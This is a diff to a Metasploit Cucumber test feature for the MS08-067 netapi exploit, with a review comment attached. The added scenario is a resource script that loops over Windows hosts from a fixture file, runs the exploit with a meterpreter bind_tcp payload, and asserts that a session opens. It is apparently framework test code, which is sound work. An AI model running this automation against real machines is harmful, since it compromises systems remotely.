|
1 |
| -@wip |
| 1 | +@targets |
2 | 2 | Feature: MS08-067 netapi
|
3 | 3 |
|
4 | 4 | Background:
|
5 | 5 | Given a directory named "home"
|
6 | 6 | And I cd to "home"
|
7 | 7 | And a mocked home directory
|
8 |
| - Given I run `msfconsole` interactively |
9 |
| - And I wait for stdout to contain "Free Metasploit Pro trial: http://r-7.co/trymsp" |
10 | 8 |
|
11 |
| - Scenario: The MS08-067 Module should have the following options |
12 |
| - When I type "use exploit/windows/smb/ms08_067_netapi" |
13 |
| - And I type "show options" |
14 |
| - And I type "exit" |
15 |
| - Then the output should contain: |
| 9 | + Scenario: The MS08-067 should get a session with bind_tcp |
| 10 | + Given I ready the windows targets |
| 11 | + And a file named "ms08-067.rc" with: |
16 | 12 | """
|
17 |
| - Module options (exploit/windows/smb/ms08_067_netapi): |
18 |
| -
|
19 |
| - Name Current Setting Required Description |
20 |
| - ---- --------------- -------- ----------- |
21 |
| - RHOST yes The target address |
22 |
| - RPORT 445 yes Set the SMB service port |
23 |
| - SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) |
24 |
| -
|
25 |
| -
|
26 |
| - Exploit target: |
27 |
| -
|
28 |
| - Id Name |
29 |
| - -- ---- |
30 |
| - 0 Automatic Targeting |
31 |
| -
|
| 13 | + <ruby> |
| 14 | + hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml') |
| 15 | + self.run_single('use exploit/windows/smb/ms08_067_netapi') |
| 16 | + self.run_single('set payload windows/meterpreter/bind_tcp') |
| 17 | + hosts['windows'].each do |host| |
| 18 | + self.run_single("set RHOST #{host['ip']}") |
| 19 | + self.run_single('run') |
| 20 | + sleep 1 |
| 21 | + end |
| 22 | + |
| 23 | + </ruby> |
32 | 24 | """
|
33 |
| - |
34 |
| - Scenario: The MS08-067 Module should have the following advanced options |
35 |
| - When I type "use exploit/windows/smb/ms08_067_netapi" |
36 |
| - And I type "show advanced" |
37 |
| - And I type "exit" |
38 |
| - Then the output should contain: |
39 |
| - """ |
40 |
| - Module advanced options: |
41 |
| -
|
42 |
| - Name : CHOST |
43 |
| - Current Setting: |
44 |
| - Description : The local client address |
45 |
| -
|
46 |
| - Name : CPORT |
47 |
| - Current Setting: |
48 |
| - Description : The local client port |
49 |
| -
|
50 |
| - Name : ConnectTimeout |
51 |
| - Current Setting: 10 |
52 |
| - Description : Maximum number of seconds to establish a TCP connection |
53 |
| -
|
54 |
| - Name : ContextInformationFile |
55 |
| - Current Setting: |
56 |
| - Description : The information file that contains context information |
57 |
| -
|
58 |
| - Name : DCERPC::ReadTimeout |
59 |
| - Current Setting: 10 |
60 |
| - Description : The number of seconds to wait for DCERPC responses |
61 |
| -
|
62 |
| - Name : DisablePayloadHandler |
63 |
| - Current Setting: false |
64 |
| - Description : Disable the handler code for the selected payload |
65 |
| -
|
66 |
| - Name : EnableContextEncoding |
67 |
| - Current Setting: false |
68 |
| - Description : Use transient context when encoding payloads |
69 |
| -
|
70 |
| - Name : NTLM::SendLM |
71 |
| - Current Setting: true |
72 |
| - Description : Always send the LANMAN response (except when NTLMv2_session is |
73 |
| - specified) |
74 |
| -
|
75 |
| - Name : NTLM::SendNTLM |
76 |
| - Current Setting: true |
77 |
| - Description : Activate the 'Negotiate NTLM key' flag, indicating the use of |
78 |
| - NTLM responses |
79 |
| -
|
80 |
| - Name : NTLM::SendSPN |
81 |
| - Current Setting: true |
82 |
| - Description : Send an avp of type SPN in the ntlmv2 client Blob, this allow |
83 |
| - authentification on windows Seven/2008r2 when SPN is required |
84 |
| -
|
85 |
| - Name : NTLM::UseLMKey |
86 |
| - Current Setting: false |
87 |
| - Description : Activate the 'Negotiate Lan Manager Key' flag, using the LM key |
88 |
| - when the LM response is sent |
89 |
| -
|
90 |
| - Name : NTLM::UseNTLM2_session |
91 |
| - Current Setting: true |
92 |
| - Description : Activate the 'Negotiate NTLM2 key' flag, forcing the use of a |
93 |
| - NTLMv2_session |
94 |
| -
|
95 |
| - Name : NTLM::UseNTLMv2 |
96 |
| - Current Setting: true |
97 |
| - Description : Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key |
98 |
| - is true |
99 |
| -
|
100 |
| - Name : Proxies |
101 |
| - Current Setting: |
102 |
| - Description : A proxy chain of format type:host:port[,type:host:port][...] |
103 |
| -
|
104 |
| - Name : SMB::ChunkSize |
105 |
| - Current Setting: 500 |
106 |
| - Description : The chunk size for SMB segments, bigger values will increase |
107 |
| - speed but break NT 4.0 and SMB signing |
108 |
| -
|
109 |
| - Name : SMB::Native_LM |
110 |
| - Current Setting: Windows 2000 5.0 |
111 |
| - Description : The Native LM to send during authentication |
112 |
| -
|
113 |
| - Name : SMB::Native_OS |
114 |
| - Current Setting: Windows 2000 2195 |
115 |
| - Description : The Native OS to send during authentication |
116 |
| -
|
117 |
| - Name : SMB::VerifySignature |
118 |
| - Current Setting: false |
119 |
| - Description : Enforces client-side verification of server response signatures |
120 |
| -
|
121 |
| - Name : SMBDirect |
122 |
| - Current Setting: true |
123 |
| - Description : The target port is a raw SMB service (not NetBIOS) |
124 |
| -
|
125 |
| - Name : SMBDomain |
126 |
| - Current Setting: . |
127 |
| - Description : The Windows domain to use for authentication |
128 |
| -
|
129 |
| - Name : SMBName |
130 |
| - Current Setting: *SMBSERVER |
131 |
| - Description : The NetBIOS hostname (required for port 139 connections) |
132 |
| -
|
133 |
| - Name : SMBPass |
134 |
| - Current Setting: |
135 |
| - Description : The password for the specified username |
136 |
| -
|
137 |
| - Name : SMBUser |
138 |
| - Current Setting: |
139 |
| - Description : The username to authenticate as |
140 |
| -
|
141 |
| - Name : SSL |
142 |
| - Current Setting: false |
143 |
| - Description : Negotiate SSL for outgoing connections |
144 |
| -
|
145 |
| - Name : SSLCipher |
146 |
| - Current Setting: |
147 |
| - Description : String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH" |
148 |
| -
|
149 |
| - Name : SSLVerifyMode |
150 |
| - Current Setting: PEER |
151 |
| - Description : SSL verification method (Accepted: CLIENT_ONCE, |
152 |
| - FAIL_IF_NO_PEER_CERT, NONE, PEER) |
153 |
| -
|
154 |
| - Name : SSLVersion |
155 |
| - Current Setting: SSL3 |
156 |
| - Description : Specify the version of SSL that should be used (Accepted: SSL2, |
157 |
| - SSL3, TLS1) |
158 |
| -
|
159 |
| - Name : VERBOSE |
160 |
| - Current Setting: false |
161 |
| - Description : Enable detailed status messages |
162 |
| -
|
163 |
| - Name : WORKSPACE |
164 |
| - Current Setting: |
165 |
| - Description : Specify the workspace for this module |
166 |
| -
|
167 |
| - Name : WfsDelay |
168 |
| - Current Setting: 0 |
169 |
| - Description : Additional delay when waiting for a session |
170 |
| - """ |
171 |
| - |
172 |
| - @targets |
173 |
| - Scenario: Show RHOST/etc variable expansion from a config file |
174 |
| - When I type "use exploit/windows/smb/ms08_067_netapi" |
175 |
| - When RHOST is WINDOWS |
176 |
| - And I type "set PAYLOAD windows/meterpreter/bind_tcp" |
177 |
| - And I type "show options" |
178 |
| - And I type "run" |
179 |
| - And I type "exit" |
180 |
| - And I type "exit" |
181 |
| - Then the output should match /spider-wxp/ |
| 25 | + When I run `msfconsole --environment test -q -r ms08-067.rc -x exit` |
| 26 | + Then the output should contain "[*] Exploit completed, 1 session was created." |
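Review bot: the loop in the `<ruby>` block and the final assertion disagree on how many targets there are: `hosts['windows'].each` runs the exploit once per host listed in `targets.yml`, yet the scenario only passes if the output contains exactly "1 session was created.", so the feature silently depends on the fixture holding a single Windows host. Either check the count per host (or derive the expected count from the fixture) or have the step match the completion message without the hard-coded number. Related: plain `run` with a foreground meterpreter/bind_tcp payload interacts with the session on success, so the second iteration (and the trailing `-x exit`) would not be reached until that session is closed; `self.run_single('run -z')` avoids interacting, which also makes the `sleep 1` unnecessary since `run` already blocks until the handler returns. Minor: `YAML.load File.open ...` never closes the handle; `YAML.load_file(...)` is the idiomatic form. Finally, this commit deletes the two `show options` / `show advanced` scenarios without replacing them, so the option-listing coverage for the module is lost; if that is intended, say so in the commit message.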